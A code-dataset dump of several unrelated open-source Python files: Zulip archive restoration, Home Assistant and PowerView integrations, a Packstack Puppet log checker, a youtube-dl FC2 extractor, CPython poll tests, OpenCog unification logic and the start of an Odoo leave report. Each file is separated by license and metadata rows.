FROM zerver_archivedattachment_messages
INNER JOIN zerver_archivedmessage
ON zerver_archivedattachment_messages.archivedmessage_id = zerver_archivedmessage.id
WHERE zerver_archivedmessage.archive_transaction_id = %(archive_transaction_id)s
ON CONFLICT (id) DO NOTHING
""")
with connection.cursor() as cursor:
cursor.execute(query, dict(archive_transaction_id=archive_transaction_id))
def restore_data_from_archive(archive_transaction: ArchiveTransaction) -> int:
logger.info("Restoring %s", archive_transaction)
# transaction.atomic needs to be used here, rather than being a wrapper on the whole function,
# so that when we log "Finished", the process has indeed finished - and that happens only after
# leaving the atomic block - Django does work committing the changes to the database when
# the block ends.
with transaction.atomic():
msg_ids = restore_messages_from_archive(archive_transaction.id)
restore_models_with_message_key_from_archive(archive_transaction.id)
restore_attachments_from_archive(archive_transaction.id)
restore_attachment_messages_from_archive(archive_transaction.id)
archive_transaction.restored = True
archive_transaction.save()
logger.info("Finished. Restored %s messages", len(msg_ids))
return len(msg_ids)
def restore_data_from_archive_by_transactions(archive_transactions: List[ArchiveTransaction]) -> int:
# Looping over the list of ids means we're batching the restoration process by the size of the
# transactions:
message_count = 0
for archive_transaction in archive_transactions:
message_count += restore_data_from_archive(archive_transaction)
return message_count
def restore_data_from_archive_by_realm(realm: Realm) -> None:
transactions = ArchiveTransaction.objects.exclude(restored=True).filter(
realm=realm, type=ArchiveTransaction.RETENTION_POLICY_BASED)
logger.info("Restoring %s transactions from realm %s", len(transactions), realm.string_id)
message_count = restore_data_from_archive_by_transactions(transactions)
logger.info("Finished. Restored %s messages from realm %s", message_count, realm.string_id)
def restore_all_data_from_archive(restore_manual_transactions: bool=True) -> None:
for realm in Realm.objects.all():
restore_data_from_archive_by_realm(realm)
if restore_manual_transactions:
restore_data_from_archive_by_transactions(
ArchiveTransaction.objects.exclude(restored=True).filter(type=ArchiveTransaction.MANUAL),
)
def restore_retention_policy_deletions_for_stream(stream: Stream) -> None:
"""
Utility function for calling in the Django shell if a stream's policy was
set to something too aggressive and the administrator wants to restore
the messages deleted as a result.
"""
relevant_transactions = ArchiveTransaction.objects \
.filter(archivedmessage__recipient=stream.recipient, type=ArchiveTransaction.RETENTION_POLICY_BASED) \
.distinct('id')
restore_data_from_archive_by_transactions(
list(relevant_transactions)
)
def clean_archived_data() -> None:
logger.info("Cleaning old archive data.")
check_date = timezone_now() - timedelta(days=settings.ARCHIVED_DATA_VACUUMING_DELAY_DAYS)
# Associated archived objects will get deleted through the on_delete=CASCADE property:
count = 0
transaction_ids = list(ArchiveTransaction.objects.filter(
timestamp__lt=check_date).values_list("id", flat=True))
while len(transaction_ids) > 0:
transaction_block = transaction_ids[0:TRANSACTION_DELETION_BATCH_SIZE]
transaction_ids = transaction_ids[TRANSACTION_DELETION_BATCH_SIZE:]
ArchiveTransaction.objects.filter(id__in=transaction_block).delete()
count += len(transaction_block)
logger.info("Deleted %s old ArchiveTransactions.", count)
def parse_message_retention_days(
value: Union[int, str],
special_values_map: Mapping[str, Optional[int]],
) -> Optional[int]:
if isinstance(value, str) and value in special_values_map.keys():
return special_values_map[value]
if isinstance(value, str) or value <= 0:
raise RequestVariableConversionError('message_retention_days', value)
assert isinstance(value, int)
return value
| apache-2.0 | 8,044,793,871,342,519,000 | 41.713826 | 116 | 0.678899 | false |
aequitas/home-assistant | homeassistant/components/homematicip_cloud/weather.py | 4 | 2991 |
"""Support for HomematicIP Cloud weather devices."""
import logging
from homematicip.aio.device import (
AsyncWeatherSensor, AsyncWeatherSensorPlus, AsyncWeatherSensorPro)
from homematicip.aio.home import AsyncHome
from homeassistant.components.weather import WeatherEntity
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import TEMP_CELSIUS
from homeassistant.core import HomeAssistant
from . import DOMAIN as HMIPC_DOMAIN, HMIPC_HAPID, HomematicipGenericDevice
_LOGGER = logging.getLogger(__name__)
async def async_setup_platform(
hass, config, async_add_entities, discovery_info=None):
"""Set up the HomematicIP Cloud weather sensor."""
pass
async def async_setup_entry(hass: HomeAssistant, config_entry: ConfigEntry,
async_add_entities) -> None:
"""Set up the HomematicIP weather sensor from a config entry."""
home = hass.data[HMIPC_DOMAIN][config_entry.data[HMIPC_HAPID]].home
devices = []
for device in home.devices:
if isinstance(device, AsyncWeatherSensorPro):
devices.append(HomematicipWeatherSensorPro(home, device))
elif isinstance(device, (AsyncWeatherSensor, AsyncWeatherSensorPlus)):
devices.append(HomematicipWeatherSensor(home, device))
if devices:
async_add_entities(devices)
class HomematicipWeatherSensor(HomematicipGenericDevice, WeatherEntity):
"""representation of a HomematicIP Cloud weather sensor plus & basic."""
def __init__(self, home: AsyncHome, device) -> None:
"""Initialize the weather sensor."""
super().__init__(home, device)
@property
def name(self) -> str:
"""Return the name of the sensor."""
return self._device.label
@property
def temperature(self) -> float:
"""Return the platform temperature."""
return self._device.actualTemperature
@property
def temperature_unit(self) -> str:
"""Return the unit of measurement."""
return TEMP_CELSIUS
@property
def humidity(self) -> int:
"""Return the humidity."""
return self._device.humidity
@property
def wind_speed(self) -> float:
"""Return the wind speed."""
return self._device.windSpeed
@property
def attribution(self) -> str:
"""Return the attribution."""
return "Powered by Homematic IP"
@property
def condition(self) -> str:
"""Return the current condition."""
if hasattr(self._device, "raining") and self._device.raining:
return 'rainy'
if self._device.storm:
return 'windy'
if self._device.sunshine:
return 'sunny'
return ''
class HomematicipWeatherSensorPro(HomematicipWeatherSensor):
"""representation of a HomematicIP weather sensor pro."""
@property
def wind_bearing(self) -> float:
"""Return the wind bearing."""
return self._device.windDirection
| apache-2.0 | -5,606,397,275,901,277,000 | 30.484211 | 78 | 0.669007 | false |
reelai/packstack | packstack/modules/puppet.py | 4 | 3854 | # -*- coding: utf-8 -*-
import logging
import os
import re
from packstack.installer.exceptions import PuppetError
# TODO: Fill logger name when logging system will be refactored
logger = logging.getLogger()
re_color = re.compile('\x1b.*?\d\dm')
re_error = re.compile(
'err:|Syntax error at|^Duplicate definition:|^Invalid tag|'
'^No matching value for selector param|^Parameter name failed:|Error:|'
'^Invalid parameter|^Duplicate declaration:|^Could not find resource|'
'^Could not parse for|^/usr/bin/puppet:\d+: .+|.+\(LoadError\)|'
'^Could not autoload|'
'^\/usr\/bin\/env\: jruby\: No such file or directory'
)
re_ignore = re.compile(
# Puppet preloads a provider using the mysql command before it is installed
'Command mysql is missing|'
# Puppet preloads a database_grant provider which fails if /root/.my.cnf
# is missing, this is ok because it will be retried later if needed
'Could not prefetch database_grant provider.*?\\.my\\.cnf|'
# Swift Puppet module tries to install swift-plugin-s3, there is no such
# package on RHEL, fixed in the upstream puppet module
'yum.*?install swift-plugin-s3'
)
re_notice = re.compile(r"notice: .*Notify\[packstack_info\]"
"\/message: defined \'message\' as "
"\'(?P<message>.*)\'")
surrogates = [
# Value in /etc/sysctl.conf cannot be changed
('Sysctl::Value\[.*\]\/Sysctl\[(?P<arg1>.*)\].*Field \'val\' is required',
'Cannot change value of %(arg1)s in /etc/sysctl.conf'),
# Package is not found in yum repos
('Package\[.*\]\/ensure.*yum.*install (?P<arg1>.*)\'.*Nothing to do',
'Package %(arg1)s has not been found in enabled Yum repos.'),
('Execution of \'.*yum.*install (?P<arg1>.*)\'.*Nothing to do',
'Package %(arg1)s has not been found in enabled Yum repos.'),
# Packstack does not cooperate with jruby
('jruby', 'Your Puppet installation uses jruby instead of ruby. Package '
'jruby does not cooperate with Packstack well. You will have to '
'fix this manually.'),
]
def validate_logfile(logpath):
"""
Check given Puppet log file for errors and raise PuppetError if there is
any error
"""
manifestpath = os.path.splitext(logpath)[0]
manifestfile = os.path.basename(manifestpath)
with open(logpath) as logfile:
for line in logfile:
line = line.strip()
if re_error.search(line) is None:
continue
error = re_color.sub('', line) # remove colors
if re_ignore.search(line):
msg = ('Ignoring expected error during Puppet run %s: %s' %
(manifestfile, error))
logger.debug(msg)
continue
for regex, surrogate in surrogates:
match = re.search(regex, error)
if match is None:
continue
args = {}
num = 1
while True:
try:
args['arg%d' % num] = match.group(num)
num += 1
except IndexError:
break
error = surrogate % args
message = ('Error appeared during Puppet run: %s\n%s\n'
'You will find full trace in log %s' %
(manifestfile, error, logpath))
raise PuppetError(message)
def scan_logfile(logpath):
"""
Returns list of packstack_info/packstack_warn notices parsed from
given puppet log file.
"""
output = []
with open(logpath) as logfile:
for line in logfile:
match = re_notice.search(line)
if match:
output.append(match.group('message'))
return output
| apache-2.0 | -8,770,513,043,752,566,000 | 35.704762 | 79 | 0.57836 | false |
turbokongen/home-assistant | homeassistant/components/hunterdouglas_powerview/const.py | 15 | 1749 | """Support for Powerview scenes from a Powerview hub."""
import asyncio
from aiohttp.client_exceptions import ServerDisconnectedError
from aiopvapi.helpers.aiorequest import PvApiConnectionError
DOMAIN = "hunterdouglas_powerview"
MANUFACTURER = "Hunter Douglas"
HUB_ADDRESS = "address"
SCENE_DATA = "sceneData"
SHADE_DATA = "shadeData"
ROOM_DATA = "roomData"
USER_DATA = "userData"
MAC_ADDRESS_IN_USERDATA = "macAddress"
SERIAL_NUMBER_IN_USERDATA = "serialNumber"
FIRMWARE_IN_USERDATA = "firmware"
MAINPROCESSOR_IN_USERDATA_FIRMWARE = "mainProcessor"
REVISION_IN_MAINPROCESSOR = "revision"
MODEL_IN_MAINPROCESSOR = "name"
HUB_NAME = "hubName"
FIRMWARE_IN_SHADE = "firmware"
FIRMWARE_REVISION = "revision"
FIRMWARE_SUB_REVISION = "subRevision"
FIRMWARE_BUILD = "build"
DEVICE_NAME = "device_name"
DEVICE_MAC_ADDRESS = "device_mac_address"
DEVICE_SERIAL_NUMBER = "device_serial_number"
DEVICE_REVISION = "device_revision"
DEVICE_INFO = "device_info"
DEVICE_MODEL = "device_model"
DEVICE_FIRMWARE = "device_firmware"
SCENE_NAME = "name"
SCENE_ID = "id"
ROOM_ID_IN_SCENE = "roomId"
SHADE_NAME = "name"
SHADE_ID = "id"
ROOM_ID_IN_SHADE = "roomId"
ROOM_NAME = "name"
ROOM_NAME_UNICODE = "name_unicode"
ROOM_ID = "id"
SHADE_RESPONSE = "shade"
SHADE_BATTERY_LEVEL = "batteryStrength"
SHADE_BATTERY_LEVEL_MAX = 200
STATE_ATTRIBUTE_ROOM_NAME = "roomName"
PV_API = "pv_api"
PV_HUB = "pv_hub"
PV_SHADES = "pv_shades"
PV_SCENE_DATA = "pv_scene_data"
PV_SHADE_DATA = "pv_shade_data"
PV_ROOM_DATA = "pv_room_data"
COORDINATOR = "coordinator"
HUB_EXCEPTIONS = (ServerDisconnectedError, asyncio.TimeoutError, PvApiConnectionError)
LEGACY_DEVICE_SUB_REVISION = 1
LEGACY_DEVICE_REVISION = 0
LEGACY_DEVICE_BUILD = 0
LEGACY_DEVICE_MODEL = "PV Hub1.0"
| apache-2.0 | 5,346,593,109,165,850,000 | 22.958904 | 86 | 0.744997 | false |
ludobox/ludobox | bin/migrations/set_default_state.py | 2 | 1864 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Update slug to a more complete using content_type and language code
How it works :
- Scan /data folder and check is slug and folders are correct.
- If not, flag for update
- Ask user for confirmation (y/n)
- Rewrite info.json with the right slug
- Rename folder with the right slug
"""
import os
import ludobox
from ludobox import create_app
from ludobox.content import read_content
from ludobox.utils import get_resource_slug
from ludobox.flat_files import write_info_json
data_dir = os.path.join(os.getcwd(),"data")
print "CHANGES : %s"%data_dir
print "-"*10
app = create_app()
to_update = []
def confirm_choice():
confirm = raw_input( "Add 'needs_review' state to these %s folder(s) : Yes or No [y/n] ?" %len(to_update) )
if confirm != 'y' and confirm != 'n':
print("\n Invalid Option. Please Enter a Valid Option.")
return confirm_choice()
elif confirm == 'y' :
return True
elif confirm == 'n' :
return False
if __name__ == '__main__':
with app.app_context():
renames = []
for game_folder_name in os.listdir(data_dir) :
game_path = os.path.join(data_dir,game_folder_name)
if os.path.isdir(game_path):
info = read_content(game_path)
if "state" not in info.keys():
to_update.append((game_path,info))
if not len(to_update):
print "No updates needed."
exit()
if confirm_choice():
for game_path, info in to_update:
# remove file lists
info["state"] = "needs_review"
info.pop('files', None)
write_info_json(info, game_path)
print "%s content states added."%len(to_update)
else :
print 'Operation cancelled'
| agpl-3.0 | -8,533,191,821,972,472,000 | 26.014493 | 111 | 0.591202 | false |
erdincay/youtube-dl | youtube_dl/extractor/fc2.py | 6 | 4093 | #! -*- coding: utf-8 -*-
from __future__ import unicode_literals
import hashlib
from .common import InfoExtractor
from ..compat import (
compat_urllib_parse,
compat_urllib_request,
compat_urlparse,
)
from ..utils import (
ExtractorError,
)
class FC2IE(InfoExtractor):
_VALID_URL = r'^http://video\.fc2\.com/(?:[^/]+/)*content/(?P<id>[^/]+)'
IE_NAME = 'fc2'
_NETRC_MACHINE = 'fc2'
_TESTS = [{
'url': 'http://video.fc2.com/en/content/20121103kUan1KHs',
'md5': 'a6ebe8ebe0396518689d963774a54eb7',
'info_dict': {
'id': '20121103kUan1KHs',
'ext': 'flv',
'title': 'Boxing again with Puff',
},
}, {
'url': 'http://video.fc2.com/en/content/20150125cEva0hDn/',
'info_dict': {
'id': '20150125cEva0hDn',
'ext': 'mp4',
},
'params': {
'username': '[email protected]',
'password': '(snip)',
'skip': 'requires actual password'
}
}, {
'url': 'http://video.fc2.com/en/a/content/20130926eZpARwsF',
'only_matching': True,
}]
def _login(self):
(username, password) = self._get_login_info()
if username is None or password is None:
return False
# Log in
login_form_strs = {
'email': username,
'password': password,
'done': 'video',
'Submit': ' Login ',
}
# Convert to UTF-8 *before* urlencode because Python 2.x's urlencode
# chokes on unicode
login_form = dict((k.encode('utf-8'), v.encode('utf-8')) for k, v in login_form_strs.items())
login_data = compat_urllib_parse.urlencode(login_form).encode('utf-8')
request = compat_urllib_request.Request(
'https://secure.id.fc2.com/index.php?mode=login&switch_language=en', login_data)
login_results = self._download_webpage(request, None, note='Logging in', errnote='Unable to log in')
if 'mode=redirect&login=done' not in login_results:
self.report_warning('unable to log in: bad username or password')
return False
# this is also needed
login_redir = compat_urllib_request.Request('http://id.fc2.com/?mode=redirect&login=done')
self._download_webpage(
login_redir, None, note='Login redirect', errnote='Login redirect failed')
return True
def _real_extract(self, url):
video_id = self._match_id(url)
self._login()
webpage = self._download_webpage(url, video_id)
self._downloader.cookiejar.clear_session_cookies() # must clear
self._login()
title = self._og_search_title(webpage)
thumbnail = self._og_search_thumbnail(webpage)
refer = url.replace('/content/', '/a/content/') if '/a/content/' not in url else url
mimi = hashlib.md5((video_id + '_gGddgPfeaf_gzyr').encode('utf-8')).hexdigest()
info_url = (
"http://video.fc2.com/ginfo.php?mimi={1:s}&href={2:s}&v={0:s}&fversion=WIN%2011%2C6%2C602%2C180&from=2&otag=0&upid={0:s}&tk=null&".
format(video_id, mimi, compat_urllib_request.quote(refer, safe=b'').replace('.', '%2E')))
info_webpage = self._download_webpage(
info_url, video_id, note='Downloading info page')
info = compat_urlparse.parse_qs(info_webpage)
if 'err_code' in info:
# most of the time we can still download wideo even if err_code is 403 or 602
self.report_warning(
'Error code was: %s... but still trying' % info['err_code'][0])
if 'filepath' not in info:
raise ExtractorError('Cannot download file. Are you logged in?')
video_url = info['filepath'][0] + '?mid=' + info['mid'][0]
title_info = info.get('title')
if title_info:
title = title_info[0]
return {
'id': video_id,
'title': title,
'url': video_url,
'ext': 'flv',
'thumbnail': thumbnail,
}
| unlicense | -7,322,910,195,957,540,000 | 33.982906 | 143 | 0.560225 | false |
printedheart/opencog | opencog/python/pln_old/logic.py | 32 | 12367 | from opencog.atomspace import types, Atom
from itertools import permutations
class Logic(object):
"""
A base class for chainers or other logical sytems. Contains various
logical functions inspired by the AIMA chapter on first-order
logic. They all operate directly on Atoms.
"""
def __init__(self, atomspace, log):
self.log = log
self._atomspace = atomspace
def variables(self, atom):
"""
Find all the variables in an expression (which may be
repeated)
"""
if atom.is_node():
if self.is_variable(atom):
return [atom]
else:
return []
else:
result = []
for o in atom.out:
result += self.variables(o)
return result
def get_first_node(self, atom):
"""
Using a depth first search on the link, return the first Node
found. If atom is a Node just return that.
"""
if atom.is_node() and not self.is_variable(atom):
return atom
else:
for o in atom.out:
ret = self.get_first_node(o)
if not ret is None:
return ret
return None
def get_incoming_recursive(self, atom):
inc = atom.incoming
ret = set()
ret.update(inc)
for link in inc:
ret.update(self.get_incoming_recursive(link))
return list(ret)
def new_variable(self, prefix='$pln_var_'):
return self._atomspace.add_node(types.VariableNode,
prefix,
prefixed=True)
def make_n_variables(self, N):
# Todo: The variable 'i' is never used. Use itertools.repeat()?
return [self.new_variable() for i in xrange(0, N)]
# Todo: this method is never used, should it be removed?
def find(self, template):
atoms = self.lookup_atoms(template, {})
atoms = self._atomspace.get_atoms_in_attentional_focus()
atoms = [atom for atom in atoms if self.wanted_atom(atom,
template,
ground=True)]
return atoms
# Todo: The variable 'substitution' is never used
def lookup_atoms(self, template, substitution):
if len(self.variables(template)) == 0:
return [template]
if template.type == types.VariableNode:
root_type = types.Atom
atoms = self.atomspace.get_atoms_by_type(root_type)
else:
# If the atom is a link with all variables below it, then
# lookup all links of that type. If it has any nodes
# (which aren't VariableNodes!), then lookup the incoming
# set for that node
first_node = self.get_first_node(template)
if first_node is None:
root_type = template.type
atoms = self.atomspace.get_atoms_by_type(root_type)
else:
atoms = self.get_incoming_recursive(first_node)
return atoms
def wanted_atom(self,
atom,
template,
s={},
allow_zero_tv=False,
ground=False):
if atom.av['vlti']:
return False
tv_ok = (allow_zero_tv or atom.tv.count > 0)
unifies_ok = self.unify_together(atom, template, s)
grounded_ok = not ground or len(self.variables(atom)) == 0
self.log.debug("tv_ok: {0}, unifies_ok: {1}, grounded_ok: {2}".
format(tv_ok, unifies_ok, grounded_ok))
return tv_ok and unifies_ok and grounded_ok
def unify_together(self, x, y, s):
return self.unify(x, y, s) is not None
def standardize_apart(self, atom, dic=None):
"""
Create a new link where all the variables in the link are replaced
with new variables. dic creates a mapping of old variables to new ones
"""
assert isinstance(atom, Atom)
# every time $v1 appears in the original expression, it must
# be replaced with the SAME $v1001
if dic is None:
dic = {}
if atom.is_node():
if self.is_variable(atom):
if atom in dic:
return dic[atom]
else:
var = self.new_variable(prefix='$standardize_apart_')
dic[atom] = var
return var
else:
return atom
else:
# atom is a link
outgoing = [self.standardize_apart(a, dic) for a in atom.out]
sa_link = self.change_outgoing(atom, outgoing)
return sa_link
def substitute(self, substitution, atom):
"""
Substitute the substitution s into the expression x.
Atoms are immutible; this function (like others) returns a new Link
with variables replaced by their values in @substitution
"""
assert isinstance(substitution, dict)
assert isinstance(atom, Atom)
if atom.is_node():
if self.is_variable(atom):
value = substitution.get(atom, atom)
assert isinstance(value, Atom)
return value
else:
return atom
else:
outgoing = [self.substitute(substitution, o) for o in atom.out]
return self.change_outgoing(atom, outgoing)
def substitute_list(self, substitution, atoms):
result = []
for atom in atoms:
result.append(self.substitute(substitution, atom))
return result
def unify(self, x, y, substitution={}):
"""
Unify atoms x,y with substitution s; return a substitution
that would make x,y equal, or None if x,y can not unify.
"""
self.log.debug("Trying to unify:\n{0}\n{1}".format(x, y))
if substitution is None:
result = None
elif x == y:
result = substitution
elif self.is_variable(x):
result = self._unify_variable(x, y, substitution)
elif self.is_variable(y):
result = self._unify_variable(y, x, substitution)
elif (not x.is_node()) and (not y.is_node()):
if x.type != y.type:
result = None
elif len(x.out) != len(y.out):
result = None
else:
result = self._unify_outgoing(x, y, substitution)
else:
result = None
if result is not None:
self.log.debug("Unify result:\n{0}".format(result))
else:
self.log.debug("Unable to unify")
return result
def _unify_outgoing(self, x, y, substitution):
assert isinstance(x, Atom)
assert isinstance(y, Atom)
if x.is_a(types.OrderedLink):
return self._unify_outgoing_ordered(x.out, y.out, substitution)
else:
return self._unify_outgoing_unordered(x.out, y.out, substitution)
def _unify_outgoing_ordered(self, x, y, substitution):
# Try to unify the first argument of x with the first argument
# of y, then recursively do the rest.
if len(x) == 0:
return substitution
else:
s_one_arg = self.unify(x[0], y[0], substitution)
return self._unify_outgoing_ordered(x[1:], y[1:], s_one_arg)
def _unify_outgoing_unordered(self, x, y, substitution):
# A simple way to unify two UnorderedLinks
# Try to unify x with every permutation of y.
# Choose the first permutation that works (if there is one).
# TODO handle this case: there is more than one permutation
# compatible with this expression,
# but only some of them (because of variables) can be used
# anywhere else
# That could only be handled by backtracking in the rest of the
# unify algorithm (but that's too complex)
# TODO this may not be the most efficient way. Shouldn't matter
# for small links though...
for new_y in permutations(y):
s = self._unify_outgoing_ordered(x, new_y, substitution)
if s is not None:
return s
return None
def _unify_variable(self, variable, atom, substitution):
if variable in substitution:
value = substitution[variable]
return self.unify(value, atom, substitution)
elif self._occurs_check(variable, atom, substitution):
return None
else:
return self.add_binding(substitution, variable, atom)
def _occurs_check(self, variable, atom, substitution):
"""
Return true if variable occurs anywhere in atom
(or in substitute(substitution, atom), if substitution has a
binding for atom).
"""
if variable == atom:
return True
elif self.is_variable(atom) and atom in substitution:
value = substitution[atom]
return self._occurs_check(variable, value, substitution)
elif atom.is_node():
return False
else:
# Check if it occurs in any sub-expressions (i.e. outgoing
# nested links)
for o in atom.out:
if self._occurs_check(variable, o, substitution):
return True
return False
assert False
def add_binding(self, substitution, variable, value):
"""
Copy the substitution and extend it by setting variable
to value; return copy.
"""
s2 = substitution.copy()
s2[variable] = value
return s2
def change_outgoing(self, link, outgoing):
"""
Returns a new link with the same type as @link but a different
outgoing set. If you pass the same outgoing set, it will return
the same Atom!
"""
return self._atomspace.add_link(link.type, outgoing)
# Todo: Should this be a static method?
def is_variable(self, atom):
return atom.is_a(types.VariableNode)
# Miscellaneous helper functions
def link(self, type, out):
return self._atomspace.add_link(type, out)
def node(self, type, name):
return self._atomspace.add_node(type, name)
# Todo: Not currently used
def transfer_atom(self, new_atomspace, atom):
"""
transfer (or rather copy) an atom from one atomspace to
another. Assumes that both AtomSpaces have the same list of
Atom types!
returns the equivalent of atom in new_atomspace. creates it if
necessary, including the outgoing set of links.
"""
# The AtomSpace probably clones the TV objects, and it wouldn't
# matter much anyway
#tv = TruthValue(atom.tv.mean, atom.tv.count)
if atom.is_node():
return new_atomspace.add_node(atom.type, atom.name, tv=atom.tv)
else:
outgoing = [self.transfer_atom(new_atomspace, out)
for out in atom.out]
return new_atomspace.add_link(atom.type, outgoing, tv=atom.tv)
def _all_nonzero_tvs(self, atom_list):
for atom in atom_list:
assert atom in self._atomspace
return all(atom.tv.count > 0 for atom in atom_list)
def get_predicate_arguments(self, predicate_name):
"""
Find the EvaluationLink for the predicate, and return the list
of arguments (as a python list of Atoms). There must be only
one EvaluationLink for it
"""
var = self.new_variable()
template = self.link(types.EvaluationLink,
[self.node(types.PredicateNode, predicate_name),
var])
queries = self.lookup_atoms(template, {})
# It will often find the original template in the results!
queries.remove(template)
#queries = [query for query in queries if query.tv.count > 0]
if len(queries) != 1:
raise ValueError("Predicate " + predicate_name +
" must have 1 EvaluationLink")
return queries[0].out[1].out
| agpl-3.0 | 7,385,975,548,242,289,000 | 34.950581 | 78 | 0.560201 | false |
FireWRT/OpenWrt-Firefly-Libraries | staging_dir/target-mipsel_1004kc+dsp_uClibc-0.9.33.2/usr/lib/python2.7/test/test_poll.py | 41 | 6418 | # Test case for the os.poll() function
import os
import random
import select
try:
import threading
except ImportError:
threading = None
import time
import unittest
from test.test_support import TESTFN, run_unittest, reap_threads, cpython_only
try:
select.poll
except AttributeError:
raise unittest.SkipTest, "select.poll not defined -- skipping test_poll"
def find_ready_matching(ready, flag):
match = []
for fd, mode in ready:
if mode & flag:
match.append(fd)
return match
class PollTests(unittest.TestCase):
def test_poll1(self):
# Basic functional test of poll object
# Create a bunch of pipe and test that poll works with them.
p = select.poll()
NUM_PIPES = 12
MSG = " This is a test."
MSG_LEN = len(MSG)
readers = []
writers = []
r2w = {}
w2r = {}
for i in range(NUM_PIPES):
rd, wr = os.pipe()
p.register(rd)
p.modify(rd, select.POLLIN)
p.register(wr, select.POLLOUT)
readers.append(rd)
writers.append(wr)
r2w[rd] = wr
w2r[wr] = rd
bufs = []
while writers:
ready = p.poll()
ready_writers = find_ready_matching(ready, select.POLLOUT)
if not ready_writers:
raise RuntimeError, "no pipes ready for writing"
wr = random.choice(ready_writers)
os.write(wr, MSG)
ready = p.poll()
ready_readers = find_ready_matching(ready, select.POLLIN)
if not ready_readers:
raise RuntimeError, "no pipes ready for reading"
rd = random.choice(ready_readers)
buf = os.read(rd, MSG_LEN)
self.assertEqual(len(buf), MSG_LEN)
bufs.append(buf)
os.close(r2w[rd]) ; os.close( rd )
p.unregister( r2w[rd] )
p.unregister( rd )
writers.remove(r2w[rd])
self.assertEqual(bufs, [MSG] * NUM_PIPES)
def poll_unit_tests(self):
# returns NVAL for invalid file descriptor
FD = 42
try:
os.close(FD)
except OSError:
pass
p = select.poll()
p.register(FD)
r = p.poll()
self.assertEqual(r[0], (FD, select.POLLNVAL))
f = open(TESTFN, 'w')
fd = f.fileno()
p = select.poll()
p.register(f)
r = p.poll()
self.assertEqual(r[0][0], fd)
f.close()
r = p.poll()
self.assertEqual(r[0], (fd, select.POLLNVAL))
os.unlink(TESTFN)
# type error for invalid arguments
p = select.poll()
self.assertRaises(TypeError, p.register, p)
self.assertRaises(TypeError, p.unregister, p)
# can't unregister non-existent object
p = select.poll()
self.assertRaises(KeyError, p.unregister, 3)
# Test error cases
pollster = select.poll()
class Nope:
pass
class Almost:
def fileno(self):
return 'fileno'
self.assertRaises(TypeError, pollster.register, Nope(), 0)
self.assertRaises(TypeError, pollster.register, Almost(), 0)
# Another test case for poll(). This is copied from the test case for
# select(), modified to use poll() instead.
def test_poll2(self):
cmd = 'for i in 0 1 2 3 4 5 6 7 8 9; do echo testing...; sleep 1; done'
p = os.popen(cmd, 'r')
pollster = select.poll()
pollster.register( p, select.POLLIN )
for tout in (0, 1000, 2000, 4000, 8000, 16000) + (-1,)*10:
fdlist = pollster.poll(tout)
if (fdlist == []):
continue
fd, flags = fdlist[0]
if flags & select.POLLHUP:
line = p.readline()
if line != "":
self.fail('error: pipe seems to be closed, but still returns data')
continue
elif flags & select.POLLIN:
line = p.readline()
if not line:
break
continue
else:
self.fail('Unexpected return value from select.poll: %s' % fdlist)
p.close()
def test_poll3(self):
# test int overflow
pollster = select.poll()
pollster.register(1)
self.assertRaises(OverflowError, pollster.poll, 1L << 64)
x = 2 + 3
if x != 5:
self.fail('Overflow must have occurred')
# Issues #15989, #17919
self.assertRaises(OverflowError, pollster.register, 0, -1)
self.assertRaises(OverflowError, pollster.register, 0, 1 << 64)
self.assertRaises(OverflowError, pollster.modify, 1, -1)
self.assertRaises(OverflowError, pollster.modify, 1, 1 << 64)
@cpython_only
def test_poll_c_limits(self):
from _testcapi import USHRT_MAX, INT_MAX, UINT_MAX
pollster = select.poll()
pollster.register(1)
# Issues #15989, #17919
self.assertRaises(OverflowError, pollster.register, 0, USHRT_MAX + 1)
self.assertRaises(OverflowError, pollster.modify, 1, USHRT_MAX + 1)
self.assertRaises(OverflowError, pollster.poll, INT_MAX + 1)
self.assertRaises(OverflowError, pollster.poll, UINT_MAX + 1)
@unittest.skipUnless(threading, 'Threading required for this test.')
@reap_threads
def test_threaded_poll(self):
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
rfds = []
for i in range(10):
fd = os.dup(r)
self.addCleanup(os.close, fd)
rfds.append(fd)
pollster = select.poll()
for fd in rfds:
pollster.register(fd, select.POLLIN)
t = threading.Thread(target=pollster.poll)
t.start()
try:
time.sleep(0.5)
# trigger ufds array reallocation
for fd in rfds:
pollster.unregister(fd)
pollster.register(w, select.POLLOUT)
self.assertRaises(RuntimeError, pollster.poll)
finally:
# and make the call to poll() from the thread return
os.write(w, b'spam')
t.join()
def test_main():
run_unittest(PollTests)
if __name__ == '__main__':
test_main()
| gpl-2.0 | 6,599,632,463,478,398,000 | 29.131455 | 87 | 0.549392 | false |
akretion/odoo | addons/hr_holidays/report/holidays_summary_report.py | 21 | 5828 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import calendar
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from odoo import api, fields, models, _
from odoo.exceptions import UserError
class HrHolidaySummaryReport(models.AbstractModel):
_name = 'report.hr_holidays.report_holidayssummary'
_description = 'Holidays Summary Report'
def _get_header_info(self, start_date, holiday_type):
st_date = fields.Date.from_string(start_date)
return {
'start_date': fields.Date.to_string(st_date),
'end_date': fields.Date.to_string(st_date + relativedelta(days=59)),
'holiday_type': 'Confirmed and Approved' if holiday_type == 'both' else holiday_type
}
def _date_is_day_off(self, date):
return date.weekday() in (calendar.SATURDAY, calendar.SUNDAY,)
def _get_day(self, start_date):
res = []
start_date = fields.Date.from_string(start_date)
for x in range(0, 60):
color = '#ababab' if self._date_is_day_off(start_date) else ''
res.append({'day_str': start_date.strftime('%a'), 'day': start_date.day , 'color': color})
start_date = start_date + relativedelta(days=1)
return res
def _get_months(self, start_date):
# it works for geting month name between two dates.
res = []
start_date = fields.Date.from_string(start_date)
end_date = start_date + relativedelta(days=59)
while start_date <= end_date:
last_date = start_date + relativedelta(day=1, months=+1, days=-1)
if last_date > end_date:
last_date = end_date
month_days = (last_date - start_date).days + 1
res.append({'month_name': start_date.strftime('%B'), 'days': month_days})
start_date += relativedelta(day=1, months=+1)
return res
def _get_leaves_summary(self, start_date, empid, holiday_type):
res = []
count = 0
start_date = fields.Date.from_string(start_date)
end_date = start_date + relativedelta(days=59)
for index in range(0, 60):
current = start_date + timedelta(index)
res.append({'day': current.day, 'color': ''})
if self._date_is_day_off(current) :
res[index]['color'] = '#ababab'
# count and get leave summary details.
holiday_type = ['confirm','validate'] if holiday_type == 'both' else ['confirm'] if holiday_type == 'Confirmed' else ['validate']
holidays = self.env['hr.leave'].search([
